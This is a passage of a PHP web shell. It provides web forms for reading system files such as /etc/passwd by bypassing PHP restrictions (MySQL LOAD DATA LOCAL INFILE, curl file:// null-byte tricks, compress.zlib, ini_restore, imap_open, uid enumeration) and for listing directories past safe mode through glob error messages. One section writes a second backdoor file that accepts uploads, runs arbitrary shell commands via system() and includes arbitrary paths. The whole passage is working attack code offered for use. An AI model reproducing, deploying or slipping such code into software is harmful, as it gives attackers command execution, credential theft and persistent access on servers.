862$tb->headerform(array('content'=>'<FONT COLOR=RED>read file copy:</FONT><br>' .$tb->makeinput('copy','/etc/passwd' ).$tb->makeinput('',Show,'copy','submit')));
863$tb->headerform(array('content'=>'<FONT COLOR=RED>read file ini_restore:</FONT><br>' .$tb->makeinput('M2','/etc/passwd' ).$tb->makeinput('',Show,'M2','submit')));
864$tb->headerform(array('content'=>'<FONT COLOR=RED>read file or dir with imap:</FONT><br>' .$tb->makeimp('switch','/etc/passwd' ).$tb->makeinput('string','/etc/passwd' ).$tb->makeinput('string','Show','','submit')));
865$tb->headerform(array('content'=>'<FONT COLOR=RED>Make file ERORR:</FONT><br>' .$tb->makeinput('ER','Mohajer22.php' ).$tb->makeinput('ER','Write','ER','submit')));
866
867
868// read file SQL ( ) //
869if(empty($_POST['Mohajer22'])){
870} else {
871echo "read file SQL","<br>" ;
872echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
873$file=$_POST['Mohajer22'];
874
875
876$mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
877$mysql_files = explode(':', $mysql_files_str);
878
879$sql = array (
880"USE $mdb",
881'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
882"LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
883. "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
884. "ESCAPED BY '' "
885. "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
886
887"SELECT a FROM $tbl LIMIT 1"
888);
889mysql_connect ($mhost, $muser, $mpass);
890
891 foreach ($sql as $statement) {
892 $q = mysql_query ($statement);
893
894 if ($q == false) die (
895 "FAILED: " . $statement . "\n" .
896 "REASON: " . mysql_error () . "\n"
897 );
898
899 if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
900
901 echo htmlspecialchars($r[0]);
902 mysql_free_result ($q);
903 }
904echo "</textarea>";
905}
906// ERORR //
907if(empty($_POST['ER'])){
908} else {
909$ERORR=$_POST['ER'];
910echo error_log("
911<html>
912<head>
913<title> Exploit: error_log() By * TrYaG Team * </title>
914<body bgcolor=\"#000000\">
915<table Width='100%' height='10%' bgcolor='#8C0404' border='1'>
916<tr>
917<td><center><font size='6' color='#BBB516'> By TrYaG Team</font></center></td>
918</tr>
919</table>
920<font color='#FF0000'>
921</head>
922<?
923if(\$fileup == \"\"){
924ECHO \" reade for up \";
925}else{
926\$path= exec(\"pwd\");
927\$path .= \"/\$fileup_name\";
928\$CopyFile = copy(\$fileup,\"\$path\");
929if(\$CopyFile){
930echo \" up ok \";
931}else{
932echo \" no up \";
933}
934}
935if(empty(\$_POST['m'])){
936} else {
937\$m=\$_POST['m'];
938echo system(\$m);
939}
940if(empty(\$_POST['cmd'])){
941} else {
942\$h= \$_POST['cmd'];
943 print include(\$h) ;
944}
945?>
946<form method='POST' enctype='multipart/form-data' >
947<input type='file' name='fileup' size='20'>
948<input type='submit' value=' up '>
949</form>
950<form method='POST' >
951<input type='cmd' name='cmd' size='20'>
952<input type='submit' value=' open (shill.txt) '>
953</form>
954<form method='POST' enctype='multipart/form-data' >
955<input type='text' name='m' size='20'>
956<input type='submit' value=' run '>
957<input type='reset' value=' reset '>
958</form>
959", 3,$ERORR);
960}
961
962// id //
963if ($_POST['plugin'] ){
964echo "read file id" ,"<br>";
965echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
966
967
968
969 for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd
970 $ara = posix_getpwuid($uid);
971 if (!empty($ara)) {
972 while (list ($key, $val) = each($ara)){
973 print "$val:";
974 }
975 print "\n";
976 }
977 }
978 echo "</textarea>";
979 break;
980
981
982 }
983
984
985// CURL //
986if(empty($_POST['curl'])){
987
988} else {
989echo "read file CURL","<br>" ;
990echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
991$m=$_POST['curl'];
992$ch =
993curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
994curl_exec($ch);
995var_dump(curl_exec($ch));
996echo "</textarea>";
997}
998
999// copy//
1000$u1p="";
1001$tymczas="";
1002if(empty($_POST['copy'])){
1003} else {
1004echo "read file copy" ,"<br>";
1005echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
1006$u1p=$_POST['copy'];
1007$temp=tempnam($tymczas, "cx");
1008if(copy("compress.zlib://".$u1p, $temp)){
1009$zrodlo = fopen($temp, "r");
1010$tekst = fread($zrodlo, filesize($temp));
1011fclose($zrodlo);
1012echo "".htmlspecialchars($tekst)."";
1013unlink($temp);
1014echo "</textarea>";
1015} else {
1016die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
1017<B>".htmlspecialchars($u1p)."</B> dosen't exists or you don't have
1018access.</CENTER></FONT>");
1019}
1020}
1021
1022/// ini_restore //
1023if(empty($_POST['M2'])){
1024} else {
1025echo "read file ini_restore","<br> ";
1026echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
1027$m=$_POST['M2'];
1028echo ini_get("safe_mode");
1029echo ini_get("open_basedir");
1030$s=readfile("$m");
1031ini_restore("safe_mode");
1032ini_restore("open_basedir");
1033echo ini_get("safe_mode");
1034echo ini_get("open_basedir");
1035$s=readfile("$m");
1036echo "</textarea>";
1037}
1038
1039// imap //
1040
1041$string = !empty($_POST['string']) ? $_POST['string'] : 0;
1042$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;
1043
1044if ($string && $switch == "file") {
1045echo "read file imap" ,"<br>";
1046echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
1047
1048$stream = imap_open($string, "", "");
1049
1050$str = imap_body($stream, 1);
1051if (!empty($str))
1052echo "<pre>".$str."</pre>";
1053imap_close($stream);
1054echo "</textarea>";
1055} elseif ($string && $switch == "dir") {
1056echo "read dir imap","<br>" ;
1057echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
1058
1059$stream = imap_open("/etc/passwd", "", "");
1060if ($stream == FALSE)
1061die("Can't open imap stream");
1062$string = explode("|",$string);
1063if (count($string) > 1)
1064$dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
1065else
1066$dir_list = imap_list($stream, trim($string[0]), "*");
1067echo "<pre>";
1068for ($i = 0; $i < count($dir_list); $i++)
1069echo "$dir_list[$i]"."<p> </p>" ;
1070echo "</pre>";
1071imap_close($stream);
1072echo "</textarea>";
1073}
1074$tb->tdbody ("</td></tr></table>");
1075// open dir //
1076$tb->tableheader();
1077$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>Exploit: Open dir </b></td></tr></table>','center','top');
1078$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');
1079
1080if(empty($_POST['m'])){
1081echo "<div><FORM method='POST' action='$REQUEST_URI' enctype='multipart/form-data'>
1082<table id=tb><tr><td><FONT COLOR=\"RED\">path dir</FONT>
1083<INPUT type='text' name='m' size=70 value='./'>
1084<INPUT type='submit' value='show' id=input></td></tr></table></form></div>";
1085
1086} else {
1087$m=$_POST['m'];
1088$spath = $m ;
1089$path = $m ;
1090
1091
1092
1093
1094 $method = intval(trim($_POST['method']));
1095
1096 $handle = opendir($path);
1097
1098 $_folders = array();
1099
1100 $i = 0;
1101
1102 while (false !== ($file = readdir($handle)))
1103 {
1104 $full_path = "$path/$file";
1105 $perms = substr(sprintf('%o', fileperms($full_path)), -4);
1106
1107 if ((is_dir($full_path)) && ($perms == '0777'))
1108 {
1109 if (!file_exists('.*')) {
1110
1111 $_folders[$i] = $file;
1112
1113 $i++;
1114 }
1115 }
1116 }
1117
1118
1119 closedir($handle);
1120 clearstatcache();
1121
1122
1123
1124 echo '<strong><FONT COLOR=#00FF00>The folders is 777 :</strong><br />';
1125
1126 foreach ($_folders as $folder)
1127 {
1128 echo $folder.'<br />';
1129 }
1130//////////
1131$handle = opendir($path);
1132
1133 $_folders = array();
1134
1135 $i = 0;
1136
1137 while (false !== ($file1 = readdir($handle)))
1138 {
1139 $full_path = "$path/$file1";
1140 $perms = substr(sprintf('%o', fileperms($full_path)), -4);
1141
1142 if ((is_dir($full_path)) && ($perms == '0755'))
1143 {
1144 if (!file_exists('.*')) {
1145
1146 $_folders[$i] = $file1;
1147
1148 $i++;
1149 }
1150 }
1151 }
1152
1153
1154
1155 clearstatcache();
1156
1157
1158
1159 echo '</FONT><strong><FONT COLOR=#FF9900>The folders is 755 :</strong><br />';
1160
1161 foreach ($_folders as $folder)
1162 {
1163 echo $folder.'<br />';
1164 }
1165//////////
1166$handle = opendir($path);
1167
1168 $_folders = array();
1169
1170 $i = 0;
1171
1172 while (false !== ($file1 = readdir($handle)))
1173 {
1174 $full_path = "$path/$file1";
1175 $perms = substr(sprintf('%o', fileperms($full_path)), -4);
1176
1177 if ((is_dir($full_path)) && ($perms == '0644'))
1178 {
1179 if (!file_exists('.*')) {
1180
1181 $_folders[$i] = $file1;
1182
1183 $i++;
1184 }
1185 }
1186 }
1187
1188
1189
1190 clearstatcache();
1191
1192
1193
1194 echo '</FONT><strong><FONT COLOR=#CC9999>The folders is 644 :</strong><br />';
1195
1196 foreach ($_folders as $folder)
1197 {
1198 echo $folder.'<br />';
1199 }
1200//////////
1201$handle = opendir($path);
1202
1203 $_folders = array();
1204
1205 $i = 0;
1206
1207 while (false !== ($file1 = readdir($handle)))
1208 {
1209 $full_path = "$path/$file1";
1210 $perms = substr(sprintf('%o', fileperms($full_path)), -4);
1211
1212 if ((is_dir($full_path)) && ($perms == '0750'))
1213 {
1214 if (!file_exists('.*')) {
1215
1216 $_folders[$i] = $file1;
1217
1218 $i++;
1219 }
1220 }
1221 }
1222
1223
1224
1225 clearstatcache();
1226
1227
1228
1229 echo '</FONT><strong><FONT COLOR=#9999CC>The folders is 750 :</strong><br />';
1230
1231 foreach ($_folders as $folder)
1232 {
1233 echo $folder.'<br />';
1234 }
1235//////////
1236$handle = opendir($path);
1237
1238 $_folders = array();
1239
1240 $i = 0;
1241
1242 while (false !== ($file1 = readdir($handle)))
1243 {
1244 $full_path = "$path/$file1";
1245 $perms = substr(sprintf('%o', fileperms($full_path)), -4);
1246
1247 if ((is_dir($full_path)) && ($perms == '0604'))
1248 {
1249 if (!file_exists('.*')) {
1250
1251 $_folders[$i] = $file1;
1252
1253 $i++;
1254 }
1255 }
1256 }
1257
1258
1259
1260 clearstatcache();
1261
1262
1263
1264 echo '</FONT><strong><FONT COLOR=#669999>The folders is 604 :</strong><br />';
1265
1266 foreach ($_folders as $folder)
1267 {
1268 echo $folder.'<br />';
1269 }
1270//////////
1271$handle = opendir($path);
1272
1273 $_folders = array();
1274
1275 $i = 0;
1276
1277 while (false !== ($file1 = readdir($handle)))
1278 {
1279 $full_path = "$path/$file1";
1280 $perms = substr(sprintf('%o', fileperms($full_path)), -4);
1281
1282 if ((is_dir($full_path)) && ($perms == '0705'))
1283 {
1284 if (!file_exists('.*')) {
1285
1286 $_folders[$i] = $file1;
1287
1288 $i++;
1289 }
1290 }
1291 }
1292
1293
1294
1295 clearstatcache();
1296
1297
1298
1299 echo '</FONT><strong><FONT COLOR=#336699>The folders is 705 :</strong><br />';
1300
1301 foreach ($_folders as $folder)
1302 {
1303 echo $folder.'<br />';
1304 }
1305//////////
1306$handle = opendir($path);
1307
1308 $_folders = array();
1309
1310 $i = 0;
1311
1312 while (false !== ($file1 = readdir($handle)))
1313 {
1314 $full_path = "$path/$file1";
1315 $perms = substr(sprintf('%o', fileperms($full_path)), -4);
1316
1317 if ((is_dir($full_path)) && ($perms == '0606'))
1318 {
1319 if (!file_exists('.*')) {
1320
1321 $_folders[$i] = $file1;
1322
1323 $i++;
1324 }
1325 }
1326 }
1327
1328
1329
1330 clearstatcache();
1331
1332
1333
1334 echo '</FONT><strong><FONT COLOR=#996666>The folders is 606 :</strong><br />';
1335
1336 foreach ($_folders as $folder)
1337 {
1338 echo $folder.'<br />';
1339 }
1340//////////
1341$handle = opendir($path);
1342
1343 $_folders = array();
1344
1345 $i = 0;
1346
1347 while (false !== ($file1 = readdir($handle)))
1348 {
1349 $full_path = "$path/$file1";
1350 $perms = substr(sprintf('%o', fileperms($full_path)), -4);
1351
1352 if ((is_dir($full_path)) && ($perms == '0703'))
1353 {
1354 if (!file_exists('.*')) {
1355
1356 $_folders[$i] = $file1;
1357
1358 $i++;
1359 }
1360 }
1361 }
1362
1363
1364
1365 clearstatcache();
1366
1367
1368
1369 echo '</FONT><strong><FONT COLOR=#3333FF>The folders is 703 :</strong><br />';
1370
1371 foreach ($_folders as $folder)
1372 {
1373 echo $folder.'<br />';
1374 }
1375
1376
1377
1378 }
1379 $handle = opendir($path);
1380
1381 $_folders = array();
1382
1383 $i = 0;
1384
1385 while (false !== ($file1 = readdir($handle)))
1386 {
1387 $full_path = "$path/$file1";
1388 $perms = substr(sprintf('%o', fileperms($full_path)), -4);
1389
1390
1391
1392
1393 $_folders[$i] = $file1;
1394
1395 $i++;
1396
1397
1398 }
1399
1400
1401
1402 clearstatcache();
1403
1404
1405
1406 echo '</FONT><strong><FONT COLOR=#FFFF00>The folders and file all :</strong><br />';
1407
1408 foreach ($_folders as $folder)
1409 {
1410 echo $folder.'<br />';
1411 }
1412
1413 echo '</FONT><strong><FONT COLOR=#FF0000>The total : </strong>'.$i.'</FONT><br />';
1414$tb->tdbody ("</td></tr></table>");
1415$tb->tableheader();
1416$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>Exploit: break fucking safe-mode </b></td></tr></table>','center','top');
1417$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');
1418
1419
1420 error_reporting(E_WARNING);
1421 ini_set("display_errors", 1);
1422
1423 echo "<head><title>".getcwd()."</title></head>";
1424
1425 echo "<form method=POST>";
1426 echo "<div style='float: left'><FONT COLOR=\"RED\">Root directory: </FONT><input type=text name=root value='{$_POST['root']}'></div>";
1427 echo "<input type=submit value='--»'></form>";
1428
1429
1430
1431 // break fucking safe-mode !
1432
1433 $root = "/";
1434
1435 if($_POST['root']) $root = $_POST['root'];
1436
1437 if (!ini_get('safe_mode')) die("<font size=-2 face=verdana color='#CC0000'>Safe-mode is OFF.</font>");
1438echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
1439 $c = 0; $D = array();
1440 set_error_handler("eh");
1441
1442 $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
1443
1444 for($i=0; $i < strlen($chars); $i++){
1445 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";
1446
1447 $prevD = $D[count($D)-1];
1448 glob($path."*");
1449
1450 if($D[count($D)-1] != $prevD){
1451
1452 for($j=0; $j < strlen($chars); $j++){
1453
1454 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";
1455
1456 $prevD2 = $D[count($D)-1];
1457 glob($path."*");
1458
1459 if($D[count($D)-1] != $prevD2){
1460
1461
1462 for($p=0; $p < strlen($chars); $p++){
1463
1464 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
1465
1466 $prevD3 = $D[count($D)-1];
1467 glob($path."*");
1468
1469 if($D[count($D)-1] != $prevD3){
1470
1471
1472 for($r=0; $r < strlen($chars); $r++){
1473
1474 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
1475 glob($path."*");
1476
1477 }
1478
1479 }
1480
1481 }
1482
1483 }
1484
1485 }
1486
1487 }
1488
1489 }
1490
1491 $D = array_unique($D);
1492
1493
1494 foreach($D as $item) echo "{$item}\n";
1495
1496
1497
1498
1499
1500 function eh($errno, $errstr, $errfile, $errline){
1501
1502 global $D, $c, $i;
1503 preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
1504 if($o){ $D[$c] = $o[2]; $c++;}
1505
1506 }
1507 echo "</textarea>";
1508 $tb->tdbody ("</td></tr></table>");
1509 ?>